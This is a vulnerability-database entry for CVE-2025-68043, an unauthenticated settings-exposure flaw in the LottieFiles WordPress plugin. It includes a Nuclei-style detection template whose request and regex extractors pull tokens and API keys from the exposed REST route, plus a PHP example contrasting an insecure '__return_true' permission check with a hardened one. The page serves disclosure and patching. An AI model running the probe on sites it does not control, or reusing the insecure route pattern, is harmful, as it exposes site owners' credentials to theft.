
LottieFiles WordPress Plugin <= 3.0.0 - Missing Authorization

CVE-2025-68043
Verified

Description

The LottieFiles plugin for WordPress (vendor LottieFiles), versions <= 3.0.0, contains a broken access control vulnerability caused by incorrectly configured access control security levels. Because an authorization check is missing, the flaw can be exploited without any special privileges.

Severity

High

CVSS Score

7.3

Exploit Probability

2%

Affected Product

lottiefiles

Published Date

March 24, 2026

Template Author

pussycat0x

CVE-2025-68043.yaml
id: CVE-2025-68043

info:
  name: LottieFiles WordPress Plugin <= 3.0.0 - Missing Authorization
  author: pussycat0x
  severity: high
  description: |
    LottieFiles LottieFiles <= 3.0.0 contains a broken access control vulnerability caused by incorrectly configured access control security levels, letting attackers exploit missing authorization, exploit requires no special privileges.
  impact: |
    Attackers can bypass authorization to access or modify restricted resources, potentially leading to data exposure or unauthorized actions.
  remediation: |
    Update to the latest version beyond 3.0.0.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lottiefiles/lottiefiles-300-missing-authorization
    - https://patchstack.com/database/Wordpress/Plugin/lottiefiles/vulnerability/wordpress-lottiefiles-plugin-3-0-0-broken-access-control-vulnerability?_s_id=cve
    - https://plugins.svn.wordpress.org/lottiefiles/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cwe-id: CWE-862
    cve-id: CVE-2025-68043
    epss-score: 0.01771
    epss-percentile: 0.82888
  metadata:
    verified: true
    max-request: 1
    vendor: lottiefiles
    product: lottiefiles
    framework: wordpress
  tags: cve,cve2025,wordpress,wp-plugin,lottiefiles,vkev

http:
  - raw:
      - |
        GET /wp-json/lottiefiles/v1/settings/ HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "is_block_logged_in"

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '"token"\s*:\s*"([^"]+)"'
          - '"apiKey"\s*:\s*"([^"]+)"'
          - '"accessToken"\s*:\s*"([^"]+)"'
# digest: 4a0a00473045022064648e482cb1abbd751aba9614c5fc0ccd7ae299aea17a06a879bec0e2eea81a022100a4dd7dc85a48c033d8965f0c1471852207cabfd889f5ba911dbb0a1af016a40d:922c64590222798bb761d5b6d8e72950

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CVE ID:
CVE-2025-68043
CWE ID:
CWE-862

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lottiefiles/lottiefiles-300-missing-authorization
https://patchstack.com/database/Wordpress/Plugin/lottiefiles/vulnerability/wordpress-lottiefiles-plugin-3-0-0-broken-access-control-vulnerability?_s_id=cve
https://plugins.svn.wordpress.org/lottiefiles/

Remediation Steps

Update to the latest version beyond 3.0.0.
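For plugin maintainers reviewing their own REST routes, the CWE-862 pattern this entry describes looks like the following in WordPress. This is an added illustration, not the LottieFiles plugin's code (the page does not show how the plugin registered its route); the route mirrors the endpoint the template probes, while the function names and the option key are assumptions.

```php
<?php
// Added illustration of missing authorization (CWE-862) on a WordPress REST route.
// Not the plugin's code: lf_example_* names and the 'lf_example_settings' option are assumed.

// Weak form: '__return_true' as permission_callback answers every caller, so an
// unauthenticated GET /wp-json/lottiefiles/v1/settings/ returns the stored settings.
function lf_example_register_route_weak() {
    register_rest_route( 'lottiefiles/v1', '/settings', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'lf_example_get_settings',
        'permission_callback' => '__return_true',
    ) );
}

// Hardened form: the same route only answers users allowed to manage site options.
// rest_authorization_required_code() yields 401 for anonymous and 403 for logged-in callers.
function lf_example_register_route_hardened() {
    register_rest_route( 'lottiefiles/v1', '/settings', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'lf_example_get_settings',
        'permission_callback' => function () {
            if ( current_user_can( 'manage_options' ) ) {
                return true;
            }
            return new WP_Error(
                'rest_forbidden',
                __( 'You are not allowed to read these settings.' ),
                array( 'status' => rest_authorization_required_code() )
            );
        },
    ) );
}

// Defence in depth: even for authorized callers, strip credential-like keys
// (the ones the detection template extracts) before returning the settings.
function lf_example_get_settings() {
    $settings = (array) get_option( 'lf_example_settings', array() );
    unset( $settings['token'], $settings['apiKey'], $settings['accessToken'] );
    return rest_ensure_response( $settings );
}

// Only the hardened registration is hooked; the weak one is kept for comparison.
add_action( 'rest_api_init', 'lf_example_register_route_hardened' );
```

A quick check for any site is to request the route without a session cookie: a hardened route returns 401 with `rest_forbidden`, while a 200 carrying the settings body is what the template above matches on.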